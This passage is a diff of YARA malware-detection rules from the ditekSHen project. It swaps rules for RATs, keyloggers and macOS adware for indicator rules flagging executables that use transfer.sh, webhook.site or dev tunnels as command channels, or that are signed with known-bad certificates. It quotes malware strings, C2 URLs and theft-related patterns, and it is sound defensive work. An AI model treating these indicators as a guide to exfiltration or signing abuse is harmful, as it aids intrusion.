+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Transfersh_URL : FILE
 {
 	meta:
-		description = "Detects ProtonBot loader"
+		description = "Detects files referencing the transfer.sh file sharing website"
 		author = "ditekSHen"
-		id = "b0d08378-0297-5e70-99f1-1dc0fec6fa01"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "15c6ba05-199d-52ba-98bf-7e8a8eda0295"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2952-L2969"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2415-L2423"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b511dfd47109d36ffc7fcb23b49779e1164d50a28061ab724d7a2c744ac23ac8"
-		score = 75
-		quality = 75
+		logic_hash = "45b16f853bcd9c492468bc478d0a7eeecd261ae47b5b00bb1e4a79788fdec7a1"
+		score = 40
+		quality = 43
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.ProtonBot"
+		importance = 20
 
 	strings:
-		$x1 = "\\PROTON\\Release\\build.pdb" ascii
-		$x2 = "\\proton\\proton bot\\json.hpp" wide
-		$x3 = "proton bot" ascii wide
-		$s1 = "endptr == token_buffer.data() + token_buffer.size()" fullword wide
-		$s2 = "ranges.size() == 2 or ranges.size() == 4 or ranges.size() == 6" fullword wide
-		$s3 = "ref_stack.back()->is_array() or ref_stack.back()->is_object()" fullword wide
-		$s4 = "ktmw32.dll" fullword ascii
-		$s5 = "@detail@nlohmann@@" ascii
-		$s6 = "urlmon.dll" fullword ascii
+		$s1 = "//transfer.sh/get/" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( all of ( $s* ) and 1 of ( $x* ) ) )
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_Imminentrat : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_References_Publicserviceinterface : FILE
 {
 	meta:
-		description = "Detects ImminentRAT"
+		description = "Detect executables referencing public and free service interface testing and dev services as means of CnC"
 		author = "ditekSHen"
-		id = "99831b32-d8a0-5814-bf41-491f607ee825"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "f6ac752b-0afc-5834-82b4-4dbcfded2f3a"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2971-L2994"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2450-L2461"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f959fd28e818b17c962fcd5bb99fa5ac0058f22494950e0200f139703f3e756a"
-		score = 75
-		quality = 75
+		logic_hash = "2a7b4fe7ddb41a7ae895a2ac8e9bb5eda61f5b86ca35575be32d65611e2d0a9e"
+		score = 40
+		quality = 37
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$x1 = "abuse@imminentmethods.net" ascii
-		$x2 = "Imminent-Monitor-" ascii
-		$x3 = "AddressChangeListener" fullword ascii
-		$x4 = "SevenZipHelper" fullword ascii
-		$x5 = "WrapNonExceptionThrows" fullword ascii
-		$s1 = "_ENABLE_PROFILING" wide
-		$s2 = "Anti-Virus: {0}" wide
-		$s3 = "File downloaded & executed" wide
-		$s4 = "Chat - You are speaking with" wide
-		$s5 = "\\Imminent\\Plugins" wide
-		$s6 = "\\Imminent\\Path.dat" wide
-		$s7 = "\\Imminent\\Geo.dat" wide
-		$s8 = "DisableTaskManager = {0}" wide
-		$s9 = "This client is already mining" wide
-		$s10 = "Couldn't get AV!" wide
-		$s11 = "Couldn't get FW!" wide
+		$s1 = "mockbin.org/bin" ascii wide nocase
+		$s2 = "run.mocky.io/v3" ascii wide nocase
+		$s3 = "webhook.site/" ascii wide nocase
+		$s4 = "devtunnels.ms/" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $x* ) or 5 of ( $s* ) )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_Warzonerat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_56203Db039Adbd6094B6A142C5E50587 : FILE
 {
 	meta:
-		description = "Detects AveMaria/WarzoneRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "4f3df696-280c-5f2b-9511-8cc7c9dff1d6"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "b3e56f78-e79a-52e3-b29e-1f566946609e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2996-L3011"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3-L14"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1af8b0f90b0de3287499082a6d6d9da6ed62a3110018e0c0f7149353693060b2"
+		logic_hash = "38380bc1a22b8d0fe851f76d2ecadba638f10b01873be44766124fb738e23d71"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "RDPClip" fullword wide
-		$s2 = "Grabber" fullword wide
-		$s3 = "Ave_Maria Stealer OpenSource" wide
-		$s4 = "\\MidgetPorn\\workspace\\MsgBox.exe" wide
-		$s5 = "@\\cmd.exe" wide
-		$s6 = "/n:%temp%\\ellocnak.xml" wide
-		$s7 = "Hey I'm Admin" wide
-		$s8 = "warzone160" fullword ascii
+		thumbprint = "e438c77483ecab0ff55cc31f2fd2f835958fad80"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bccabdacabbdcda" and pe.signatures [ i ] . serial == "56:20:3d:b0:39:ad:bd:60:94:b6:a1:42:c5:e5:05:87" )
 }
-rule DITEKSHEN_MALWARE_Win_Karaganycore : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_B5F34B7C326C73C392B515Eb4C2Ec80E : FILE
 {
 	meta:
-		description = "Detects Karagany/xFrost core plugin"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "c066805b-9373-5524-aff9-d16cd59f5a24"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "f5d19333-4aee-52d3-aeac-822b39ec653a"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3013-L3027"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L16-L27"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cde96ac6477fda1312ce4f7532018c9f11df7d39c40155d10bdde0e3d84c6d57"
+		logic_hash = "553ef777cb7a93934caa53cc9acdc37fc4cbe2a28ae320f4a7f10b2a4073d675"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "127.0.0.1" fullword ascii
-		$s2 = "port" fullword ascii
-		$s3 = "C:\\Windows\\System32\\Kernel32.dll" fullword ascii
-		$s4 = "kernel32.dll" fullword ascii
-		$s5 = "http" ascii
-		$s6 = "Move" fullword ascii
-		$s7 = "<supportedOS Id=\"{" ascii
+		thumbprint = "9d35805d6311fd2fe6c49427f55f0b4e2836bbc5"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cdaadbffbaedaabbdedfdbfebf" and pe.signatures [ i ] . serial == "b5:f3:4b:7c:32:6c:73:c3:92:b5:15:eb:4c:2e:c8:0e" )
 }
-rule DITEKSHEN_MALWARE_Win_Karaganykeylogger : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0A1Dc99E4D5264C45A5090F93242A30A : FILE
 {
 	meta:
-		description = "Detects Karagany/xFrost keylogger plugin"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "dd14ede0-7132-5b7f-872a-d96d5275a8e4"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "8efea9da-a3ae-5af3-83b2-cac5baa4fa89"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3029-L3041"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L29-L40"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7f1f5b2ca67e62380c8a8095fed4a4fd76d7bc15c9fe2d76e780ad85f886ef7b"
+		logic_hash = "cb230503e17e93f78b04723c32d7ce66bdf146846e0208d268eebc0e446a6917"
 		score = 75
-		quality = 23
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "__klg__" fullword wide
-		$s2 = "__klgkillsoft__" fullword wide
-		$s3 = "CLIPBOARD_PASTE" wide
-		$s4 = "%s\\k%d.txt" wide
-		$s5 = "\\Update\\Tmp" wide
+		thumbprint = "17680b1ebaa74f94272957da11e914a3a545f16f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "K & D KOMPANI d.o.o." and pe.signatures [ i ] . serial == "0a:1d:c9:9e:4d:52:64:c4:5a:50:90:f9:32:42:a3:0a" )
 }
-rule DITEKSHEN_MALWARE_Win_Karaganyscreenutil : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0D53690631Dd186C56Be9026Eb931Ae2 : FILE
 {
 	meta:
-		description = "Detects Karagany/xFrost ScreenUtil module"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "5eab1bb9-a433-54e6-963b-4aca863dc73f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "f0afbdf4-68db-522f-95d7-cd76aa7b9710"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3043-L3055"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L42-L53"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d10230d94adfdddd604e2569ae3323efa1d5722647b9c704fceefe9446ccebd1"
+		logic_hash = "645c2340fe7e7ce992f3f655d5058834d0df6a64ea20ef7794893a592124c55e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "__pic__" ascii wide
-		$s2 = "__pickill__" ascii wide
-		$s3 = "\\picture.png" fullword wide
-		$s4 = "%d.jpg" wide
-		$s5 = "\\Update\\Tmp" wide
+		thumbprint = "c5d1e46a40a8200587d067814adf0bbfa09780f5"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STA-R TOV" and pe.signatures [ i ] . serial == "0d:53:69:06:31:dd:18:6c:56:be:90:26:eb:93:1a:e2" )
 }
-rule DITEKSHEN_MALWARE_Win_Karaganylistrix : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Fd8C468Cc1B45C9Cfb41Cbd8C835Cc9E : FILE
 {
 	meta:
-		description = "Detects Karagany/xFrost Listrix module"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "837cc9e7-eefb-530c-854b-51bb4444ae78"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "836af706-3a82-5aaf-9a96-244eef5820b2"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3057-L3069"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L55-L66"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "02216061dbe93b7bea108f4b27c052d87c14cfe9395c6c5d4eed46ed7819e7ae"
+		logic_hash = "495ec6dbfdec3f608e387280e2d34093bb4965f5ada7c101e3119ae970eaf80d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\Update\\Tmp\\" wide
-		$s2 = "*pass*.*" fullword wide
-		$s3 = ">> NUL" wide
-		$s4 = "%02d.%02d.%04d %02d:%02d" wide
-		$s5 = "/c del" wide
+		thumbprint = "08fc56a14dcdc9e67b9a890b65064b8279176057"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pivo ZLoun s.r.o." and pe.signatures [ i ] . serial == "fd:8c:46:8c:c1:b4:5c:9c:fb:41:cb:d8:c8:35:cc:9e" )
 }
-rule DITEKSHEN_MALWARE_Osx_Macsearch : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_32Fbf8Cfa43Dca3F85Efabe96Dfefa49 : FILE
 {
 	meta:
-		description = "Detects MacSearch adware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "facdf05c-5ee4-54c6-9ca3-01978af2b6e6"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "9a228e0e-256b-547d-af6d-960089f2f803"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3071-L3092"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L68-L79"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "973b7215fc8d04685a46d05b53b4092e7b81ed0d64d6982b534f2b89d0a59443"
+		logic_hash = "7e53dcd2e10285f710f1fb2355d77db3507ce346e8d0f26843ca8df2271a6e9e"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "open -a safari" ascii
-		$s2 = "/INDownloader" ascii
-		$s3 = "/safefinder" ascii
-		$s4 = "/INEncryptor" ascii
-		$s5 = "/INInstallerFlow" ascii
-		$s6 = "/INConfiguration" ascii
-		$s7 = "/INChromeAndFFSetter" ascii
-		$s8 = "/INSafariSetter" ascii
-		$s9 = "/bin/launchctl" fullword ascii
-		$s10 = "/usr/bin/csrutil" fullword ascii
-		$s11 = "_Tt%cSs%zu%.*s%s" fullword ascii
-		$s12 = "_Tt%c%zu%.*s%zu%.*s%s" fullword ascii
-		$s13 = "/macap/safefinder_Obf/safefinder/" ascii
-		$s14 = "/safefinder.build/Release/macsearch.build/" ascii
+		thumbprint = "498d63bf095195828780dba7b985b71ab08e164f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0xfacf and 10 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foxstyle LLC" and pe.signatures [ i ] . serial == "32:fb:f8:cf:a4:3d:ca:3f:85:ef:ab:e9:6d:fe:fa:49" )
 }
-rule DITEKSHEN_MALWARE_Osx_Genieo : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_7E0Ccda0Ef37Acef6C2Ebe4538627E5C : FILE
 {
 	meta:
-		description = "Detects LinqurySearch/Genieo adware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "ac44eefd-bf1c-5d4b-bcd4-9a5d394ac1d3"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "89006ac2-5cbc-5e7f-9ca6-51316b8d4bfd"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3094-L3112"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L81-L92"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "951dc8539435a52d9eea00b3fdaf98cf618c03867066819f2f9244165e57c675"
+		logic_hash = "aed6c65f9c6400c0cc94386be684d3b9dd8d7637f9798fb49f4f651cf28b2d12"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Osx.Trojan.Genieo"
-
-	strings:
-		$s1 = "<key>com.apple.security.get-task-allow</key>" fullword ascii
-		$s2 = "U1QQFXAfCxAfRUNCH1JZXh9" ascii
-		$s3 = "XVFTQ1VRQlNYH" ascii
-		$s4 = "dF9HXlxfUVQQVUJCX0IQHRB" ascii
-		$s5 = "Value:forHTTPHeaderField:" ascii
-		$s6 = "postContent:::" fullword ascii
-		$s7 = "postLog:" fullword ascii
-		$s8 = "initWithBase64EncodedString:options:" fullword ascii
-		$s9 = "do shell script \"%@\" with administrator privileges" fullword ascii
-		$s10 = /LinqurySearch-[a-f0-9]{40,}/
+		thumbprint = "a758d6799e218dd66261dc5e2e21791cbcccd6cb"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0xfacf and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Orangetree B.V." and pe.signatures [ i ] . serial == "7e:0c:cd:a0:ef:37:ac:ef:6c:2e:be:45:38:62:7e:5c" )
 }
-rule DITEKSHEN_MALWARE_Osx_AMCPCVARK : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0095E5793F2Abe0B4Ec9Be54Fd24F76Ae5 : FILE
 {
 	meta:
-		description = "Detects OSX TechyUtils/PCVARK adware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "1378364b-db10-5194-98f8-5347504a92e6"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "94878b56-5b29-55a8-a8ec-7ace588e34ef"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3114-L3139"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L94-L105"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b18a9f578af98feb5107d9ef85850457ba5921ab58af7b097a815e3af74f05f7"
+		logic_hash = "b1f8867b47c1bec43b3603af343d6d5728ec218a66863a6777c0ee59ae1faa98"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Osx.Adware.AMC-PCVARK-TechyUtils"
-
-	strings:
-		$s1 = "Mac Auto Fixer.app" fullword ascii
-		$s2 = "com.techyutil.macautofixer" fullword ascii
-		$s3 = "com.findApp.findApp" ascii
-		$s4 = "Library/Preferences/%@.plist" fullword ascii
-		$s5 = "Library/%@/%@" fullword ascii
-		$s6 = "Library/Application Support/%@/%@" fullword ascii
-		$s7 = "sleep 3; rm -rf \"%@\"" fullword ascii
-		$s8 = "Silently calling url: %@" ascii
-		$cnc1 = "cloudfront.net/getdetails" ascii
-		$cnc2 = "trk.entiretrack.com/trackerwcfsrv/tracker.svc/trackOffersAccepted/?" ascii
-		$cnc3 = "pxl=%@&x-count=1&utm_source=%@&lpid=0&utm_content=&utm_term=&x-base=&utm_medium=%@&utm_publisher=%@&offerpxl=&x-fetch=1&utm_campaign=@&affiliateid=&x-at=&btnid=" ascii
-		$x1 = "mafsysinfo" fullword ascii
-		$x2 = "MAF4497_MAF4399_MAF2204" ascii
-		$developerid = "Developer ID Application: Rahul Gahlot (RZ74UYT742)" ascii
+		thumbprint = "6acdfee2a1ab425b7927d0ffe6afc38c794f1240"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0xfacf and ( 6 of ( $s* ) or 2 of ( $cnc* ) or all of ( $x* ) or $developerid )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kommservice LLC" and pe.signatures [ i ] . serial == "00:95:e5:79:3f:2a:be:0b:4e:c9:be:54:fd:24:f7:6a:e5" )
 }
-rule DITEKSHEN_MALWARE_Osx_Realtimespy : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00C167F04B338B1E8747B92C2197403C43 : FILE
 {
 	meta:
-		description = "Detects macOS RealtimeSpy monitoring app"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "6485abf3-896c-54cd-ad84-7bd86456e47b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d838e09b-e2f2-585a-a33d-bfe34f989e77"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3141-L3166"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L107-L118"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4ef2e1b8d34962cd3eab23f401b764b38b8332233aa2ae91b218af499d8ab8ff"
+		logic_hash = "008fe748c7956c1885c7d7e3a843d2310c17b7552dbbe9b4750809a5642d7ca6"
 		score = 75
-		quality = 57
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Osx.Trojan.RealtimeSpy"
-
-	strings:
-		$x1 = "SPYAGENT4HASHCIPHER" fullword ascii
-		$x2 = ":username:password:acctid:compUser:compName:" ascii
-		$x3 = ":username:password:acctid:compName:" ascii
-		$x4 = "://www.realtime-spy-mac.com/" ascii
-		$x5 = "/Users/spytech/" ascii
-		$x6 = "shell script \"touch /private/var/db/.AccessibilityAPIEnabled\" password \"pwd\" with administrator privileges" ascii
-		$x7 = "Content-Disposition: form-data; name=\"raptor_" ascii
-		$c1 = "_OBJC_CLASS_$_LocationLogger" fullword ascii
-		$c2 = "_OBJC_CLASS_$_MonitoringFunctions" fullword ascii
-		$c3 = "_OBJC_CLASS_$_ProcessLogger" fullword ascii
-		$c4 = "_OBJC_CLASS_$_RealtimeLoggingFunctions" fullword ascii
-		$c5 = "_OBJC_CLASS_$_Realtime_SpyAppDelegate" fullword ascii
-		$c6 = "_OBJC_CLASS_$_ScreenshotLogger" fullword ascii
-		$c7 = "_OBJC_CLASS_$_Uploader" fullword ascii
-		$c8 = "_OBJC_CLASS_$_UsageLogger" fullword ascii
-		$c9 = "_OBJC_CLASS_$_WebsiteLogger" fullword ascii
+		thumbprint = "7af7df92fa78df96d83b3c0fd9bee884740572f9"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0xfacf and ( 2 of ( $x* ) or 2 of ( $c* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTUNE STAR TRADING, INC." and pe.signatures [ i ] . serial == "00:c1:67:f0:4b:33:8b:1e:87:47:b9:2c:21:97:40:3c:43" )
 }
-rule DITEKSHEN_MALWARE_Osx_Maxofferdeal : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Fc7065Abf8303Fb472B8Af85918F5C24 : FILE
 {
 	meta:
-		description = "Detects macOS MaxOfferDeal adware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "aec4ab77-7025-5856-99fb-aa7b86413c00"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d8c25f8a-e129-5cd4-9e60-d2e7ebbb1ea6"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3168-L3187"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L120-L131"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a9788b2049ae7f345760a078b2932e79fe8fc0dd71e0446c213df64480c3e3d6"
+		logic_hash = "8ce0d25ef802948f754f155010f42d76256895ebd6ffdce8d97063dada58e668"
 		score = 75
-		quality = 46
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Osx.Adware.MaxOfferDeal"
-
-	strings:
-		$s1 = "clEvE15obfuscated_data" ascii
-		$s2 = "%.*s.%.*s" fullword ascii
-		$s3 = "_Tt%cSs%zu%.*s%s" fullword ascii
-		$s4 = "_Tt%c%zu%.*s%zu%.*s%s" fullword ascii
-		$s5 = "__ZL20tFirefoxProfilesPath" ascii
-		$s6 = "__ZL22tFirefoxSearchFileName" ascii
-		$s7 = "__ZL37tFirefoxDefaultProfileFolderExtension" ascii
-		$s8 = "__ZL21tFirefoxPrefsFileName" ascii
-		$s9 = "__GLOBAL__sub_I_Firefox.mm" ascii
-		$s10 = "add_image_hook_" ascii
-		$s11 = "/Library/Caches/com.apple.xbs/Sources/arclite/arclite-66/source/" fullword ascii
+		thumbprint = "b61a6607154d27d64de35e7529cb853dcb47f51f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0xfacf and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIG IN VISION SP Z O O" and pe.signatures [ i ] . serial == "00:fc:70:65:ab:f8:30:3f:b4:72:b8:af:85:91:8f:5c:24" )
 }
-rule DITEKSHEN_MALWARE_Osx_Windtrail : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00B61B8E71514059Adc604Da05C283E514 : FILE
 {
 	meta:
-		description = "Detects WindTrail OSX trojan"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "abf7cd20-b37d-5d0a-8f3f-f4e491965713"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d52bd370-a1da-56f1-8edd-da61c9e2e75b"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3189-L3206"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L133-L144"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "291f919cb1e8c4b33960dd3f2c842b9efec04852bd5661543e3ee60bc0fc5ba6"
+		logic_hash = "b771d40e4e2db1d3f26d8fb2fa140f57871712700e584005d2377b701fc9538a"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Osx.Trojan.WindTrail"
-
-	strings:
-		$s1 = "m_ComputerName_UserName" fullword ascii
-		$s2 = "m_uploadURL" fullword ascii
-		$s3 = "m_logString" fullword ascii
-		$s4 = "GenrateDeviceName" fullword ascii
-		$s5 = "open -a" fullword ascii
-		$s6 = "AESEncryptFile:toFile:usingPassphrase:error:" fullword ascii
-		$s7 = "scheduledTimerWithTimeInterval:target:selector:userInfo:repeats:" fullword ascii
-		$s8 = "_kLSSharedFileListSessionLoginItems" fullword ascii
-		$developerid = "Developer ID Application: warren portman (95RKE2AA8F)" ascii
